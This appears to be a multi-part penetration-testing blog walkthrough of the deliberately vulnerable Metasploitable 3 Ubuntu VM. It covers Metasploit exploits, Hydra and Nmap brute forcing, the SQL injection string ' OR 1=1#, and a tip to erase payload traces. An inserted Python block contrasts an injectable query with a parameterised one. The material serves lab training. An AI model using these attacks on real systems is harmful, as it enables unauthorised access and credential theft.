<p>The Trembling Uterus – Advanced ethical hacking, Kali Linux and general security tutorials. By Rui Natário (http://www.blogger.com/profile/12067366039242874604).</p>
<h1>Metasploitable 3 Ubuntu Walkthrough: Part VII</h1>
<p>Published 2020-11-18.</p>
<h2>Exploiting Port 6697 – Unreal IRCd</h2>
<p>This service was already exploited in <a title="Metasploitable 2" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-ix.html">Metasploitable 2</a>. But is it the same version?</p>
<p><a href="https://drive.google.com/uc?id=1vn4zYybTJ1G1n3LC5ihtuVIvBI0jQ1gS" target="_blank"><img width="822" height="199" title="Service detection using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Service detection using Nmap" src="https://drive.google.com/uc?id=1mEGwa-tjB6JJZMjTDIDYynK-Icy8RH9F" border="0"></a></p>
<p>It is not possible to determine the specific version running on Metasploitable 3, but since there is only one exploit module available in MSF, we had better try it.</p>
<p><a href="https://drive.google.com/uc?id=1DrKGVZb0mgeHStU00f_KrLu5ajiRe0B9" target="_blank"><img width="816" height="175" title="MSF exploit module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF exploit module" src="https://drive.google.com/uc?id=1E7JYuedn7vYNI2A8JJWNGmD7gR8tOxJt" border="0"></a></p>
<p>Like before, this is a very easy exploit:</p>
<p><a href="https://drive.google.com/uc?id=1Q9bBC5haHRMtML9UIvuzKcIVsrCdOycV" target="_blank"><img width="806" height="348" title="Exploiting Unreal IRCd using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Unreal IRCd using Metasploit" src="https://drive.google.com/uc?id=1pBdkTXQWR3Jj9_v66qNWhF0PZnflU7uh" border="0"></a></p>
<p>This is a low privilege shell because boba_fett is not a member of the sudo group. He is, however, a member of the <strong><em>docker</em></strong> group…</p>
<h1>Metasploitable 3 Ubuntu Walkthrough: Part VI</h1>
<p>Published 2020-11-18.</p>
<h2>Exploiting Port 631 – CUPS</h2>
<p>The Metasploitable 3 VM is running the Common Unix Printing System (CUPS) with the web-based interface enabled:</p>
<p><a href="https://drive.google.com/uc?id=1IcJx90l5okQkegErUlTNotBAR3G1-nII" target="_blank"><img width="764" height="395" title="CUPS web interface" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="CUPS web interface" src="https://drive.google.com/uc?id=1QUcwtdRFW23UKN6bXnBOHXtCndqE6vWj" border="0"></a></p>
<p>A remote attacker can exploit CUPS to execute arbitrary commands via crafted fields during the creation or modification of a printer.
The 'PRINTER_INFO' and 'PRINTER_LOCATION' fields can be set to contain arbitrary commands, which are executed when a print job is submitted, provided the remote host is running a vulnerable version of Bash.</p>
<p>Searching in MSF, you will find one exploit for this service:</p>
<p><a href="https://drive.google.com/uc?id=1ZUODNzOkHISON-uus7q-3WfsbLkyQFge" target="_blank"><img width="806" height="142" title="CUPS exploit in MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="CUPS exploit in MSF" src="https://drive.google.com/uc?id=1HOWnhPpzouNqcaU_1apJzXOJVckJs9A9" border="0"></a></p>
<p>Let’s use it:</p>
<p><a href="https://drive.google.com/uc?id=1GfysRZgEryzOtDcr_H1HRJy7etSEUV3u" target="_blank"><img width="806" height="303" title="Exploiting CUPS using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting CUPS using Metasploit" src="https://drive.google.com/uc?id=1bvd8ROYbrhmYt9UcszeKYIeshIOJ4EKG" border="0"></a></p>
<p>The exploit fails due to a configuration error in the Metasploitable 3 VM. You can read the details here:</p>
<p><a href="https://github.com/rapid7/metasploitable3/issues/459">https://github.com/rapid7/metasploitable3/issues/459</a></p>
<h1>Metasploitable 3 Ubuntu Walkthrough: Part V</h1>
<p>Published 2020-11-15.</p>
<h2>Port 137 (UDP) – NetBIOS Name Service</h2>
<p>The name service operates on UDP port 137. It is usually not exploitable, but it is useful for enumeration.</p>
<h3>Enumerating NetBIOS with NBTScan</h3>
<p>NBTScan is a command line tool for scanning networks to obtain NetBIOS share and name information. It runs on both Unix and Windows and ships with Kali Linux by default.</p>
<p><a href="https://drive.google.com/uc?id=1EwUesyblrYCri2XhSkPZFfy6ZMBL9_Ub" target="_blank"><img width="756" height="521" title="Enumerating NetBIOS with NBTScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating NetBIOS with NBTScan" src="https://drive.google.com/uc?id=1f9jFYlZgP7tgE2h8i_IbMsOrlfTWCmvi" border="0"></a></p>
<p>In this case there is not a lot of information, but it is always better than nothing.</p>
<h3>Enumerating NetBIOS with Nmap</h3>
<p>Nmap contains a script that can also be used to discover NetBIOS shares. This has the advantage that it can be run together with other NSE scripts, saving time when enumerating many different things on a network.</p>
<p><a href="https://drive.google.com/uc?id=1q1607AW1FDxNc513hZMYrQTpZkWTmxIC" target="_blank"><img width="796" height="277" title="Enumerating NetBIOS with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating NetBIOS with Nmap" src="https://drive.google.com/uc?id=1YsfmsE988xf9hfuEO2dLQn7BIp9cqqCy" border="0"></a></p>
<h1>Metasploitable 3 Ubuntu Walkthrough: Part IV</h1>
<p>Published 2020-11-12.</p>
<h2>Exploiting Port 80 – Apache Server</h2>
<p>Let’s start by getting as much information as possible about the remote website.
Let’s try getting some additional information with Metasploit:</p>
<p><a href="https://drive.google.com/uc?id=1xX0-no_MvxqbB7qJkvxwCOKGajfNV1ZZ" target="_blank"><img width="541" height="230" title="Enumerating Apache Server using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Apache Server using Metasploit" src="https://drive.google.com/uc?id=12HjzX_oa-MiYCVcSq5RJc56vXiArTdYU" border="0"></a></p>
<p>There is something interesting here: the <b><em>/cgi-bin/</em></b> directory. Is there any exploit for this?</p>
<p><a href="https://drive.google.com/uc?id=12j92C-Ejz-g3c55jCKhWqtq00aS1KpiH" target="_blank"><img width="833" height="305" title="Looking for an exploit in the ExploitDB" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Looking for an exploit in the ExploitDB" src="https://drive.google.com/uc?id=1bv3MGfNy25_Scg3QRQ4dE0KGuEtKvkl4" border="0"></a></p>
<p>There is a Metasploit module to exploit this vulnerability:</p>
<p><a href="https://drive.google.com/uc?id=1bX0_X36juCM1C4jY83xK9pu514woTxE8" target="_blank"><img width="806" height="191" title="Exploiting Apache Server using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Apache Server using Metasploit" src="https://drive.google.com/uc?id=1-LWLaWgK49YdUc1st5bsALoc8uNRBaub" border="0"></a></p>
<p>Another failed attempt. This was supposed to work, but it didn’t…</p>
<h2>Exploiting Port 80 – WebDAV</h2>
<p>Let’s get more information about the target using Directory Buster:</p>
<p><a href="https://drive.google.com/uc?id=1BJEKV-3ZSE8hhD2BM3Ni-hS6dYMMFxBT" target="_blank"><img width="608" height="396" title="Enumerating using Directory Buster" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating using Directory Buster" src="https://drive.google.com/uc?id=1oZOKFpLJQ0GmvxmkwjS6h4t260g1usT1" border="0"></a></p>
<p><a href="https://drive.google.com/uc?id=1MMv3tzPtcJeNvB-LWpTEOlo2efmmeSF9" target="_blank"><img width="608" height="340" title="Enumerating using Directory Buster" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating using Directory Buster" src="https://drive.google.com/uc?id=1fULPbVzsfMDqowQXjCAqNwvV-H_T2bf2" border="0"></a></p>
<p>The <b><em>uploads</em></b> directory looks promising. But is it writable? Let’s check it out.
You can do WebDAV enumeration using Metasploit.</p>
<p><a href="https://drive.google.com/uc?id=1aFiKRaJVcUnv6_412cWeav-4KrU7jayg" target="_blank"><img width="806" height="365" title="Testing WebDAV using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Testing WebDAV using Metasploit" src="https://drive.google.com/uc?id=1wLkW_q0zijkQt1-bAY-LZ_3c1Zmw7_-s" border="0"></a></p>
<p>As you can see, the <em><b>uploads</b></em> directory is writable and a number of different file formats can be uploaded there.</p>
<p>From here you need to create a payload, deploy it, set up a listener and execute the payload, and you will have a shell…!</p>
<p>For detailed step-by-step instructions using multiple tools and options, please check my other <a title="Metasploitable 3" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-3-windows-walkthrough.html">Metasploitable 3</a> tutorial.</p>
<h1>Metasploitable 3 Ubuntu Walkthrough: Part III</h1>
<p>Published 2020-11-12.</p>
<h2>Exploiting Port 80 – Drupal</h2>
<p>Drupal is a free and open-source web content management framework written in PHP and distributed under the GNU General Public License.</p>
<p>When browsing port 80 with Firefox, Apache presents a directory listing containing a number of entries:</p>
<p><a href="https://drive.google.com/uc?id=1CWcXd0C4lH4hfFfNnD9JDMadna0pPorf" target="_blank"><img width="457" height="331" title="Port 80 directory listing" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Port 80 directory listing" src="https://drive.google.com/uc?id=1Jbe_Vt0FerS1zJzqf2ko-z1eCHIU7aXG" border="0"></a></p>
<p>If you go back to the OpenVAS report, you will see a lot of potential on port 80:</p>
<p><a href="https://drive.google.com/uc?id=1Ei2kSkRuYz4m7i2sb0y7zePoOc_sirTH" target="_blank"><img width="806" height="173" title="OpenVAS list of port 80 services vulnerabilities" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS list of port 80 services vulnerabilities" src="https://drive.google.com/uc?id=1Y1A63D-cT_olxobf64Gu134KLaJuALMZ" border="0"></a></p>
<p>The first thing to do is to identify Drupal’s version. Analyzing the source code of the Drupal page immediately gives some information about the website’s structure, namely that many resources are served from the <b><em>drupal/modules</em></b> folder.</p>
<p><a href="https://drive.google.com/uc?id=1yn9bpy3ryOSfkuk8ribXl1SPAs0TvvR0" target="_blank"><img width="806" height="321" title="Drupal webpage source code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Drupal webpage source code" src="https://drive.google.com/uc?id=1zEGmLIW0Hf_atTOC1tH5d4S_m8FqaW9S" border="0"></a></p>
<p>Digging and researching online will lead you to the <strong><em>blog.info</em></strong> file located inside the <b><em>drupal/modules/blog</em></b> folder.</p>
<p><a href="https://drive.google.com/uc?id=1KXLWUzXpOxqmE1LVIT6Oss0x54a7U87f" target="_blank"><img width="806" height="400" title="Drupal version" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Drupal version" src="https://drive.google.com/uc?id=1PKFzB7wg7tRD0qdNAUGakjnRgUQol-fz" border="0"></a></p>
<p>Now you know Drupal is version 7.5.</p>
<h3>Exploiting Drupal using Metasploit</h3>
<p>Searching inside MSF, you will find several modules available against Drupal:</p>
<p><a href="https://drive.google.com/uc?id=1OXS6PCgQR2_RZ3BirjgRneA1yMYogkGR" target="_blank"><img width="806" height="181" title="List of Metasploit modules for Drupal" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="List of Metasploit modules for Drupal" src="https://drive.google.com/uc?id=12ELfQJtjzsrlxwC6zRQhBlBgTYl7tE4s" border="0"></a></p>
<p>Comparing this list with the vulnerabilities identified by OpenVAS tells you that exploits 2 and 3 are probably going to succeed.</p>
<p>Let’s try to exploit the SQL injection vulnerability:</p>
<p><a href="https://drive.google.com/uc?id=13Ls_7Z3m3--yUs5UqwASl_ai6nPjcp5R" target="_blank"><img width="806" height="253" title="Exploiting Drupal using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Drupal using Metasploit" src="https://drive.google.com/uc?id=1EyAmpa8by6paEdubGRglP7Se3p858ZN-" border="0"></a></p>
<p>This is a low privilege session…</p>
<p><b>NOTES:</b></p>
<ul><li>The targeturi was set to /drupal/ instead of root (/) because that is the Drupal directory on the Apache web server.</li><li>This exploit is supposed to work only against Drupal 7.0 through 7.31 (the vulnerability was fixed in 7.32). The server apparently has version 7.5 and is still vulnerable.</li></ul>
<p>Now let’s try to exploit the remote code execution vulnerability:</p>
<p><a href="https://drive.google.com/uc?id=1ndWRukjtmpR59j_MZTmLwMGN1Ex_FWx1" target="_blank"><img width="806" height="225" title="Exploiting Drupal using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Drupal using Metasploit" src="https://drive.google.com/uc?id=1toJ6ojbSi-WzV81pV44YlLMfqycVLwPx" border="0"></a></p>
<p>And this is another low privilege shell…</p>
<h2>Exploiting Port 80 – Payroll Application</h2>
<p>Another interesting item is the file <b><em>payroll_app.php</em></b>.
Clicking on it will load a <b><em>Payroll Login</em></b> interface.</p>
<p><a href="https://drive.google.com/uc?id=1Ir2kCNtSaurDo5-wa1vrgDewI4eLH6xZ" target="_blank"><img width="531" height="358" title="Payroll Login" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Payroll Login" src="https://drive.google.com/uc?id=1L2s7vA6-06yTzo5iVwhZKaWHEhduSw8o" border="0"></a></p>
<p>The Nmap scan identified a MySQL server running on Metasploitable 3, so it might be a good idea to try a basic SQL injection attack. Let’s use the classic <b><em>' OR 1=1#</em></b>.</p>
<p><a href="https://drive.google.com/uc?id=1gtzyO6kbjbaR0aH8RwDdvBkWEOWTGniL" target="_blank"><img width="396" height="242" title="Trying basic SQL injection" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Trying basic SQL injection" src="https://drive.google.com/uc?id=1fhM8Jp71Rvs24CRTZuQkRWQ-Bo5jxTAD" border="0"></a></p>
<p>Clicking the OK button with the classic injection string in the User input box immediately reveals a total of 15 users in the Payroll App.</p>
<p><a href="https://drive.google.com/uc?id=1E0Y0V-8Tp_HHBgjfUBEmGibCrdYYyC44" target="_blank"><img width="469" height="763" title="Successful SQL injection" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Successful SQL injection" src="https://drive.google.com/uc?id=1W6Fhd4_bdPo7mZO6jAJ2l36gQBs2f4Yj" border="0"></a></p>
<p>This could be the beginning of a real SQL injection attack, but instead I went after the code of the Payroll app. I remembered the file was listed in a previous exploit, namely ProFTPD.</p>
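<p>Why the classic string above returns every row, and what stops it, as an added example that is not code from this post or from the Metasploitable 3 payroll app: a constructed SQLite <code>users</code> table is queried the vulnerable way (input pasted into the SQL string) and the hardened way (bound parameters). SQLite does not accept MySQL's <code>#</code> comment marker, so the injection is written in its <code>--</code> form here; the mechanics are identical.</p>

```python
import sqlite3

# Constructed sample rows standing in for the payroll database's users table
# (names echo the lab's accounts; passwords and salaries are made up).
SAMPLE_USERS = [
    ("leia", "pw-leia", 50000),
    ("luke", "pw-luke", 48000),
    ("han", "pw-han", 47000),
    ("boba_fett", "pw-boba", 30000),
    ("chewbacca", "pw-chewie", 29000),
]

# The post's payload is "' OR 1=1#"; "#" is MySQL's line comment.
# SQLite (used here so the example runs offline) needs "--" for the same effect.
INJECTION = "' OR 1=1-- "


def connect_sample_db() -> sqlite3.Connection:
    """Build an in-memory users table from the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The mistake behind the screenshot: form input spliced into the SQL text.

    With username = "' OR 1=1-- " the WHERE clause becomes
        username='' OR 1=1-- ' AND password='...'
    so the password check is commented out and every row comes back.
    """
    sql = (
        "SELECT username, salary FROM users "
        "WHERE username='%s' AND password='%s'" % (username, password)
    )
    return conn.execute(sql).fetchall()


def login_hardened(conn, username, password):
    """Same query with bound parameters: the input is compared as data,
    never parsed as SQL, so the tautology is just a username that does not exist."""
    sql = "SELECT username, salary FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    """Return (rows leaked by the vulnerable query, rows returned by the hardened
    query for the same payload, rows for a legitimate hardened login)."""
    conn = connect_sample_db()
    leaked = login_vulnerable(conn, INJECTION, "anything")
    blocked = login_hardened(conn, INJECTION, "anything")
    legit = login_hardened(conn, "leia", "pw-leia")
    return len(leaked), len(blocked), len(legit)


if __name__ == "__main__":
    print(demo())  # (5, 0, 1): the vulnerable query dumps the whole table
```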
<p>So, I repeated the exploit and investigated the contents of the file <b><em>payroll_app.php</em></b>.</p>
<p><a href="https://drive.google.com/uc?id=1EN6VkiMB1p8klMWfOmEZFeHHmw0j-PKw" target="_blank"><img width="806" height="260" title="Credentials inside the payroll_app.php file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Credentials inside the payroll_app.php file" src="https://drive.google.com/uc?id=1MqwMCf08NvJDvQEYJsKN_Pj6XhkhegA4" border="0"></a></p>
<p>These appear to be the credentials for the Payroll application, but they are not…</p>
<p><a href="https://drive.google.com/uc?id=1r3CP-oeDkeKhApCAeCr3BAQkaZJ-rgso" target="_blank"><img width="505" height="254" title="Payroll failed logon" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Payroll failed logon" src="https://drive.google.com/uc?id=1ETRprCLC7xQ18BqKwCvVgxPPO5-S4GYg" border="0"></a></p>
<p>However, let’s not forget about these credentials, as they might still be useful.</p>
<h2>Exploiting Port 80 – phpMyAdmin</h2>
<p>Opening the phpMyAdmin link takes you to the service login page:</p>
<p><a href="https://drive.google.com/uc?id=16S7A2hBlmC9TFA4qdfukGQZyh4SMsczG" target="_blank"><img width="439" height="499" title="phpMyAdmin login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="phpMyAdmin login page" src="https://drive.google.com/uc?id=1SaPLZiBotkb2-xZy22-GcI8-g_tCiC8R" border="0"></a></p>
<h3>Brute forcing phpMyAdmin using Hydra</h3>
<p>Brute forcing this service requires a bit of research but nothing special. You can use the wordlists provided with Kali, or you can add the previously found credentials to the customized wordlists.</p>
<p><a href="https://drive.google.com/uc?id=1hptWXjAukLMpj0vIE1ZR8qKp_CbeYhDT" target="_blank"><img width="806" height="168" title="Brute forcing phpMyAdmin using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing phpMyAdmin using Hydra" src="https://drive.google.com/uc?id=1dQDnprQuq2BljsTgX1nAAZJuZLQml265" border="0"></a></p>
<p>The credentials are valid for the phpMyAdmin service!</p>
<h3>Brute forcing phpMyAdmin using Metasploit</h3>
<p>There is a scanner module to use against phpMyAdmin, but it’s broken and therefore completely useless:</p>
<p><a href="https://drive.google.com/uc?id=1hGpRP1f34M2gmjZH-iUuC-nD3ifiZYEQ" target="_blank"><img width="808" height="445" title="Brute forcing phpMyAdmin using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing phpMyAdmin using Metasploit" src="https://drive.google.com/uc?id=1gAmYhcJHK68-6tpBl1F9Pfo_FYdwJIQO" border="0"></a></p>
<h3>Exploiting phpMyAdmin using Metasploit</h3>
<p>The phpMyAdmin web application running on Metasploitable 3 has a remote code execution vulnerability that can be exploited using the <b><em>phpmyadmin_preg_replace</em></b> module:</p>
<p><a href="https://drive.google.com/uc?id=1Qg0UmM12tIrhfmzK0c8K8HwUK-Ng34ox" target="_blank"><img width="806" height="309" title="Exploiting phpMyAdmin using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting phpMyAdmin using Metasploit" src="https://drive.google.com/uc?id=10r8giYkB897vxoFSyNUg036n4-SyWPq-" border="0"></a></p>
<p>Unfortunately, something went wrong with this exploit. It might be a simple thing, but I decided not to waste time investigating it. Instead, I tried to use the previously collected credentials…</p>
<p><a href="https://drive.google.com/uc?id=14DeIlenunRMW8Dj0_ybKOu42CyF1rUm-" target="_blank"><img width="806" height="292" title="Exploiting phpMyAdmin using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting phpMyAdmin using Metasploit" src="https://drive.google.com/uc?id=1FcIyMtiJjsyjYioHS8hrEFE0-cUd3wp7" border="0"></a></p>
<p>It worked! The created session is a low privilege one, but this means the credentials are valid for phpMyAdmin. Therefore, instead of using them inside MSF, why not use them directly in the phpMyAdmin login page?</p>
<p><a href="https://drive.google.com/uc?id=1AsQ3c1Hicvq0dQvq2bKfw4j10cCNac2h" target="_blank"><img width="806" height="387" title="Inside the phpMyAdmin dashboard" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Inside the phpMyAdmin dashboard" src="https://drive.google.com/uc?id=1QWRvNsoV_zYrM9OsBNjAL4lOft7K4w0f" border="0"></a></p>
<p>From here, everything is at your disposal.
Take a look at the <b>users</b> table inside the <strong><em>payroll</em></strong> <b>database</b>:</p>
<p><a href="https://drive.google.com/uc?id=1R2niOsr2_7UwG28F4Bmzcj7DpYeR7U3x" target="_blank"><img width="798" height="535" title="The payroll database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The payroll database" src="https://drive.google.com/uc?id=1MYjquVqXpIkI84qqaP5_rS4H201Mqgg6" border="0"></a></p>
<p>You still need root access to the target, so why not add all this information to your user/pass custom wordlists and try to brute force SSH again?</p>
<p><a href="https://drive.google.com/uc?id=1P7aWS6ABtGWfdgRjB-wQtgnrFjClO9S3" target="_blank"><img width="792" height="607" title="Brute forcing SSH with the new credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with the new credentials" src="https://drive.google.com/uc?id=1XR9I_cb8S6NtK2YklAQjoFDo7E0vFL04" border="0"></a></p>
<p>It works! All these accounts have SSH access and, on top of that, Leia, Luke and Han all have <b><em>sudo</em></b> privileges, so some of these sessions have root access to the target machine.</p>
<h1>Metasploitable 3 Ubuntu Walkthrough: Part II</h1>
<p>Published 2020-11-10.</p>
<h2>Exploiting Port 21 – ProFTPD</h2>
<p>The FTP service can potentially be exploited in several ways. Let’s try a few of them. Users can access the Metasploitable VM by logging into the FTP server with a valid set of credentials, so it is a good idea to try to get access to this service.
Pay attention to the results you got from OpenVAS:</p>
<p><a href="https://drive.google.com/uc?id=1xyL58PSn50Yb5JKXuanYw92QiyGMW6nS" target="_blank"><img width="806" height="204" title="OpenVAS reporting ProFTPD vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting ProFTPD vulnerability" src="https://drive.google.com/uc?id=1LxtCDiEvwhcZTYEljmK0tcMyckvGI7Z1" border="0"></a></p>
<h3>Brute forcing ProFTPD using Hydra</h3>
<p>Kali Linux has a number of wordlists that can be used for this purpose. Let’s use Hydra to launch an attack:</p>
<p><strong><em>hydra -L [users file] -P [passwords file] [IP] [service]</em></strong></p>
<p><a href="https://drive.google.com/uc?id=1LNozWKwRUIY9ZdMhSRc1o9Phy6IwJOav" target="_blank"><img width="806" height="219" title="Brute forcing ProFTPD using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ProFTPD using Hydra" src="https://drive.google.com/uc?id=1jR64vW862fptuQyvDvg6YubAeGgRhaYa" border="0"></a></p>
<p>This will take a very long time because the tool tries every password for each user. And it might not return any good results unless you use carefully selected wordlists.</p>
<h3>Brute forcing ProFTPD using Nmap</h3>
<p>Using the wordlists provided with Kali and the proper Nmap script (<b><em>ftp-brute</em></b>), you will also get positive results, sometimes faster than with Hydra.</p>
<p><a href="https://drive.google.com/uc?id=1KjqSgEXrDLLiZnSfBjyWJcIw3RL4b2j0" target="_blank"><img width="806" height="235" title="Brute forcing ProFTPD using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ProFTPD using Nmap" src="https://drive.google.com/uc?id=111IlgPTM3eLXPtv97drLoECOcFn1vlvL" border="0"></a></p>
<h3>Brute forcing ProFTPD using Metasploit</h3>
<p>Metasploit has an auxiliary module that can also be used to brute force FTP passwords, just like Hydra did. I like to use it last, with custom wordlists.</p>
<p><a href="https://drive.google.com/uc?id=1i9YXOSDRvm-ZADrzICA5g1fuK6lEjjf8" target="_blank"><img width="806" height="229" title="Brute forcing ProFTPD using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ProFTPD using Metasploit" src="https://drive.google.com/uc?id=18cHfymXq2uHcnjmjLEik1s985BfuaiyA" border="0"></a></p>
<p>Using the custom wordlists previously created will produce the same results.
But using Metasploit has a major advantage over Hydra: the credentials found are automatically added to the database.</p>
<p><a href="https://drive.google.com/uc?id=1Hsx5oIjYir8lsRRBBVMV7uIqPA-8Hl4I" target="_blank"><img width="688" height="123" title="MSF database with found credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF database with found credentials" src="https://drive.google.com/uc?id=1mizxxG1iiczgFMc1YEG5_0qOMaw5rWjy" border="0"></a></p>
<h3>Enumerating via ProFTPD</h3>
<p>Once you have found a valid credential set, you can use it to log in to the remote FTP server:</p>
<p><a href="https://drive.google.com/uc?id=1XiJXtt5z2axO0IeYyXKzu-QJiI8V5BDI" target="_blank"><img width="782" height="674" title="Enumerating via ProFTPD" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating via ProFTPD" src="https://drive.google.com/uc?id=1b78xDvZDRo0iKTYMd-NQP1I0V8Jo0lDN" border="0"></a></p>
<p>You now have a list of the system’s users and you can explore further to get extra data.</p>
<h3>Exploiting ProFTPD using Metasploit</h3>
<p>If you look closely at the OpenVAS scan results, you will see this:</p>
<p><a href="https://drive.google.com/uc?id=1SjGk5wNCOd4UMN7p38FGyMPk4-Zbi0L7" target="_blank"><img width="806" height="38" title="OpenVAS reporting ProFTPD vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting ProFTPD vulnerability" src="https://drive.google.com/uc?id=1ZPM290C5pX6oAJ5Zq29duc7p1lGUgH6k" border="0"></a></p>
<p>Searching for an exploit in MSF returns these results:</p>
<p><a href="https://drive.google.com/uc?id=1dbbD7NJ-NpKNvOtUm5lDSkz0HMNIKUXA" target="_blank"><img width="806" height="199" title="Searching for an exploit in MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Searching for an exploit in MSF" src="https://drive.google.com/uc?id=1zFHOgnYyBFsg5nuv0s1Fazgin9D0mOaP" border="0"></a></p>
<p>As you can see, there is a specific module for this vulnerability. Use it!</p>
<p><a href="https://drive.google.com/uc?id=18mHk9751gdPkC2xGvNUbmnP9bkBVLkB1" target="_blank"><img width="806" height="305" title="Exploiting ProFTPD using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting ProFTPD using Metasploit" src="https://drive.google.com/uc?id=1QTH7U7TQWWedOSAGnhBiE-WTExBWX0be" border="0"></a></p>
<p>This exploit gained remote access as the <b><em>www-data</em></b> user. Not very useful, but always better than nothing, right?</p>
<p>Don’t forget to clean up your tracks by removing the payload used.</p>
<p><a href="https://drive.google.com/uc?id=1qRuJbQtk8b3pr94_ZidBgWryoT8IArSw" target="_blank"><img width="806" height="419" title="Deleting the PHP payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deleting the PHP payload" src="https://drive.google.com/uc?id=1T3Ghznt4T0f06LrP9Rg_rMK7q8sEZSWS" border="0"></a></p>
<h2>Exploiting Port 22 – SSH</h2>
<p>This port/service can also be attacked using the usual tools of the trade. Besides, keep in mind that it is sometimes easy to get credentials for other running services.
Then, using the previously identified credentials, it is easy to create a small custom list of usernames and passwords and attempt to get more using the usual tools.</p>
<p><a href="https://drive.google.com/uc?id=1aEcn70qnc12HWvUUyJ3yA3goGHQmV-zY" target="_blank"><img width="806" height="202" title="OpenVAS reporting SSH vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting SSH vulnerability" src="https://drive.google.com/uc?id=17pr5J7llzL1zkM8pRLZLirYv_MObLiHr" border="0"></a></p>
<h3>Brute forcing SSH using Hydra</h3>
<p>Basically the same as before, but this time much slower due to limitations in SSH.</p>
<p><a href="https://drive.google.com/uc?id=1lHBLUBOliBGVeQTNJF9oz_ECJG6PfAEu" target="_blank"><img width="806" height="159" title="Brute forcing SSH using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Hydra" src="https://drive.google.com/uc?id=1ADCgWuwOS9OoBy_RseQ5mTObYvvj2UF_" border="0"></a></p>
<h3>Brute forcing SSH using Nmap</h3>
<p>Using Kali’s wordlists, you will get some results.</p>
<p><a href="https://drive.google.com/uc?id=1NRFO_uQDx-QOqEtoepe6tXtcDJ03ZJ22" target="_blank"><img width="806" height="109" title="Brute forcing SSH using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Nmap" src="https://drive.google.com/uc?id=1yEAucJirvKkT807JhmGUU3nkgjytYZbR" border="0"></a></p>
<p><a href="https://drive.google.com/uc?id=1JGyo-TpU_U1gjxXN_Z1jIG6RukrZttZZ" target="_blank"><img width="806" height="128" title="Brute forcing SSH using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Nmap" src="https://drive.google.com/uc?id=15uVcgWHZhroVa0GijwfDGcmsKV0U3OpZ" border="0"></a></p>
<h3>Brute forcing SSH using Metasploit</h3>
<p>Now that you have at least one valid credential, it might be a good idea to use it in Metasploit. Each successful login immediately opens a session on the remote machine, and the valid credentials are added to the MSF database.</p>
<p><a href="https://drive.google.com/uc?id=1BvJD3Awu6OZqr0QUoKp8nB7zePufB3Qb" target="_blank"><img width="806" height="497" title="Brute forcing SSH using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Metasploit" src="https://drive.google.com/uc?id=1C7RqRpNCntECbeau3srStjuVGiBe2Uei" border="0"></a></p>
<p>You will get a command session and you can upgrade it to a Meterpreter session!</p>
<h1>Metasploitable 3 Ubuntu Walkthrough: Part I</h1>
<p>Published 2020-11-10.</p>
<p>Metasploitable 3 is an Ubuntu 14.04 VM that is built from the ground up with a large number of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit. Not every vulnerability on Metasploitable 3 can be exploited with a single Metasploit module, but some can.</p>
<h2>Network Setup</h2>
